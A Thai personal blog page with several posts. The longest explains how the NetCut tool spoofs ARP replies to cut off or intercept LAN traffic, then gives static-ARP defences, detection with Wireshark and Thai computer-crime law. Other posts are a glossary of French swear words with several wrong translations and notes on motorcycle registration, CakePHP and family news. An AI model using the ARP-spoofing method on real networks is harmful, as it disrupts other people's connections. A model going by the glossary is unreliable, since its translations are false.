cracker สามารถใช้ net cut ในการปลอมแปลง MAC address โดยการส่ง ARP Reply ไปบอก router ว่า MAC เครื่องเรา มี IP เป็นของเครื่อง cracker (พูดง่าย ๆ ก็คือ ไปขโมย MAC addr จากเครื่องเรามาใช้) นั่นก็แสดงว่า เฟรมที่ถูกส่งมาจาก Router ด้วย MAC addr เรา ก็จะวิ่งไปยัง IP ที่ cracker ได้ไป Map ไว้ใหม่กับ MAC addr ของเรา การกระทำเช่นนี้ เราเรียกเป็นศัพท์เท่ห์ (แต่อย่าทำนะครับ) ว่า Man-in-the-middle attack ครับ

และ cracker ไม่จำเป็นต้องทำเช่นนั้นเสมอไป เพราะ cracker สามารถเปลี่ยน MAC addr ของเราไปเป็น IP อื่น ๆ ซึ่งอาจจะไม่ได้เชื่อมต่อในระบบเครือข่าย หรือ เปลี่ยน MAC addr ของ Default Gateway เราให้มีค่าไม่ถูกต้อง ทำให้ เราไม่สามารถใช้งาน internet ได้นั่นเอง

ที่เขียนอย่างนี้ ไม่ได้หมายความว่า cracker สามารถมาแก้ข้อมูลใน ARP cache ของเรา โดยตรง แต่ cracker อาศัยหลักการทำงานของ Ethernet ว่า ก่อนที่ใครจะส่งข้อมูลก็จะต้องมีการถาม MAC addr ก่อน เช่น เครื่องเรา ต้องการติดต่อไปที่ www.google.com แน่นอน ว่า เมื่อถาม Routable มันก็ต้อง route ไปที่ IP ของ Gateway เครื่องเรา แต่ถ้าเครื่องเราไม่ได้ กำหนด MAC addr ไว้เป็นแบบ static เครื่องเราก็จะ broadcast message โดย ARP Request ไปถามในระบบเครือข่ายว่า IP Gateway ที่ กำหนดไว้ในเครื่องเราตรงกับ MAC addr ของใคร ถ้าในเหตุการณ์ปรกติ เครื่อง Router ก็จะส่ง ARP Response ตอบข้อความให้กับเรา แล้วเราก็นำ MAC addr ตัวนั้นไปเก็บใน ARP cache และส่งข้อมูลผ่านไปยัง Router แต่ ถ้ามีเครื่อง cracker ที่ run netcat ไว้ มันก็จะพยายามแย่งตอบ MAC addr ของ Router ที่ผิด ๆ มาให้เครื่องเรา register ใน ARP cache ทำให้ เครื่องเรา ส่งข้อมูลผ่านไปยัง IP ที่ผิด ๆ นั้นไป และ ไม่สามารถส่งข้อมูลออกไปยังระบบเครือข่ายข้างนอกได้ครับ ( จริง ๆ แล้วต้องบอกว่าส่งได้ แต่มัน Route ไปผิดที่มากกว่า )

โปรแกรมนี้ ใช้งานได้กับ อุปกรณ์ทุกตัวที่มี MAC addr รวมไปถึง Switch ต่าง ๆ ด้วยครับ

ดังนั้นวิธีป้องกัน มีดังนี้
- Block ด้วย Firewall ไม่ให้ ping ได้ , ไม่ให้ scan port ได้ หรือ ที่มันฉลาดพอที่จะป้องกัน arp cache ของเราได้
- กำหนด MAC ให้เป็นแบบ static จะได้ไม่โดนเปลี่ยน
Windows:
c:\> arp -a [ เพื่อตรวจสอบดูว่า gateway เรา มีค่า MAC addr เป็นอะไร ต้องทำก่อนที่จะโดน netcut นะครับ ]
c:\> arp -s 192.168.193.xxx 00-0f-8f-2a-dc-xx
[ เพื่อ เพิ่ม MAC ADDR 00-0f-8f-2a-dc-xx ที่ match กับ IP 192.168.193.xxx เป็นแบบ static ]
c:\> arp -a [ เพื่อตรวจสอบดูค่า MAC addr อีกครั้ง ]
ถ้าโดน netcut เล่นงานไปแล้ว ให้สั่ง arp -d เพื่อลบ MAC addr เก่าที่ผิดไปก่อน
เพิ่มเติม arp /?

Linux:
# arp -a
# arp -i eth0 -s 192.168.193.xxx 00-0f-8f-2a-dc-xx
# arp -anv เพิ่มเติม #man arp

- run anti-netcut โปรแกรมนี้ ผมเดาเอาว่ามันน่าจะใช้วิธีแข่งกัน update ARP response กับ netcut เพื่อไม่ให้ใช้ค่า MAC addr ที่ผิด ๆ ไป พอแข่งกันยิง ARP มันก็ทำให้ Traffic jam มากกว่าเดิม แถมต้องเสียเวลา CPU กับ RAM ไปในสิ่งที่ไม่ควรจะเสียอีกด้วย

run netcut ทำเพื่ออะไร?
- เพื่อทดสอบการทำงานของ ARP Protocol [ดี]
- เพื่อต้องการใช้ Bandwidth คนเดียว โดยการปลอม MAC addr ของ Router ที่ผิดไปบอกชาวบ้านในวง LAN ทำให้ ไม่มีใครสามารถใช้งานระบบเครือข่ายข้างนอกได้ เนื่องจาก cracker รู้ MAC addr ของ Router จริง ๆ เพียงผู้เดียว [ไม่ดี]

วิธีหาผู้ร้าย
ให้ run โปรแกรมพวก sniffer ต่าง ๆ เช่น Wireshark (คิดว่าคงได้ลง Lab กันไปแล้ว) แล้วสังเกตว่าเครื่องไหน broadcast arp packet เยอะผิดปรกติ ก็ตั้งสมมุติฐานไว้ได้เลยครับหรือ ถ้าเครื่องไหน มี MAC addr หลาย ๆ ตัว ที่ จับคู่กับ IP ตัวเดียว ก็เครื่องนั้นแหละ Netcut run อยู่แน่ ๆ

วิธีแก้ปัญหา
หากจับได้ว่าใคร แอบ Run Netcut อย่าคิดไปทำกลับครับ (ไม่มีประโยชน์) ให้ Capture หน้าจอนั้นไว้แล้วส่ง Mail ไปฟ้องผู้ดูแลระบบให้ลงโทษกับคนที่ประพฤติตัวเช่นนี้ครับ

พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ที่เกี่ยวข้องกับโปรแกรม Netcut
มาตรา 10 ผู้ใดกระทำด้วยประการใดโดยมิชอบ เพื่อให้การทำการของระบบคอมพิวเตอร์ของผู้อื่นถูกระงับ ชะลอ ขัดขวาง หรือ รบกวนจนไม่สามารถทำงานตามปกติได้ต้องระวางโทษจำคุก ไม่เกินห้าปี หรือปรับไม่เกินหนึ่งแสนบาท หรือ ทั้งจำทั้งปรับ

คำหยาบของภาษาฝรั่งเศส

รู้ไว้ จะได้รู้เวลาโดนใครด่า ^_^

Fuck you - vas te faire encule
Damn - à deux balles
Shit - merde
Prick - piquer
Vagina - vagin

การต่อทะเบียนรถมอเตอร์ไซค์

การทะเบียนรถมอเตอร์ไซค์ขนส่งจังหวัดภูเก็ต
เอกสารในการต่อทะเบียนใช้ทะเบียนรถ + ค่าต่อทะเบียน 100 บาท
ค่าทำพรบ. ประมาณ 300 บาท
ค่าตรวจสภาพรถ ประมาณ 60 บาท หาร้านที่มี logo ตรอ.
ค่าปรับ เดือนละ 1 บาท

การต่อทะเบียนรถ ห้ามให้ทะเบียนรถขาดนานเกิน 3 ปี ไม่งั้นจะต้องโดนจดทะเบียนรถใหม่ พร้อมทั้งจ่ายค่าภาษีย้อนหลัง และ จะต้องทำที่จังหวัดที่ทะเบียนรถได้จดทะเบียนไว้ด้วย หรือ เราจะแจ้งหยุดการใช้งานรถก่อนก็ได้ แต่ถ้ามาเปิดการใช้งานใหม่ ก็โดนจ่ายภาษีย้อนหลังอยู่ดี แต่สิ่งที่แตกต่างกันก็คือ ไม่จำเป็นต้องจดทะเบียนใหม่ แต่มันก็ไม่ได้ต่างกันมากหรอก เพราะว่า การแจ้งหยุด หรือ เปิดใหม่ มันก็ต้องทำที่จังหวัด ที่ทะเบียนรถได้จดไว้ด้วย -_-"

สงสัยเพิ่มเติม โทร: 076-214929

NS-2 802.11e HCCA

วันนี้ได้คุยกับคุณโดม (KU) ผู้เชี่ยวชาญ IEEE 802.11e
เค้าทดลองโดยใช้ NS-2 โดยใช้ Patch ของคนนี้ครับ

http://info.iet.unipi.it/~cng/ns2hcca/

รวบรวมข้อมูลไว้ก่อน กันลืม

..:: My Profile ::..

Warodom 's Official Web Site (ไม่ได้ปรับปรุงสักที -_-" )
http://plex.coe.psu.ac.th/

PleX's Music Life, (Blog สมัย เขียนใน Manager นานมาแล้ว)
http://www.mastonline.com/publichome/wwarodom/

Photos Album
http://picasaweb.google.com/wwarodom/

..:: My Communities ::..

Guitarist Web Site สำหรับคนที่รักในเสียงเพลง
http://guitarist.vze.com/

CoE9 Webboard
http://coe9.vze.com/

---

ย่าเสียชีวิตแล้วครับ

วันนี้ตอนเช้า พ่อ โทรมาบอกว่า ย่าผม ที่กันตัง เสียชีวิตแล้วครับ T_T

Picasa web tool testing

วันนี้ลองใช้ picasa web มันช่างเป็น tool ที่ใช้ในการ publish รูปที่สุดยอดจริง ๆ
นอกจากจะเชื่อมกับ album ของมันเองแล้ว ยังสามารถที่จะเชื่อมกับ blog ได้อีกด้วยนะเนี่ย

รูปนี้ถ่ายไว้นานแล้ว สมัยหัดเล่นกีต้าร์ไฟฟ้าใหม่ ๆ แต่เพิ่งเอามา post เดี๋ยวค่อยมาเล่นต่อ
ไปทำงานก่อนดีกว่า ;-)

วันนี้หัดลองเล่น CakePHP

เมื่อติดตั้งครั้งแรก ติดปัญหา หา file ไม่เจอ ซึ่งเป็นเพราะ Apache ไม่ได้เปิด mod_rewrite ไว้นั่นเอง mod_rewrite ก็เอาไว้ ใช้ในการแปลง URL จาก parameter ก็อยู่ในรูป folder หรือจะแปลงแบบอื่น ๆ ก็ได้

หลังจากจัดการ enable mod_rewrite ได้แล้ว ก็ run cakePHP ขึ้นมาได้แล้วละ แต่มันค่อนข้างautomatic พอสมควร อยากเปลี่ยน template ของ cakePHP ใหม่ โดย remove banner ของมันออกแล้วก็ เอา SQL Query ข้างล่างออก ซึ่งก็ทำได้ดังนี้

Remove SQL query at -> C:\AppServ\www\cakephp\app\config\core.php [set debug to 1]
Remove banner at -> C:\AppServ\www\cakephp\cake\libs\view\layouts\default.ctp [ remove banner or footer ]

กำลังเริ่มสนุกแล้วละ เดี๋ยวว่าง ๆ กลับมาเล่นต่อนะ วันนี้ขอตัวไปนอนก่อนเด้อ....อ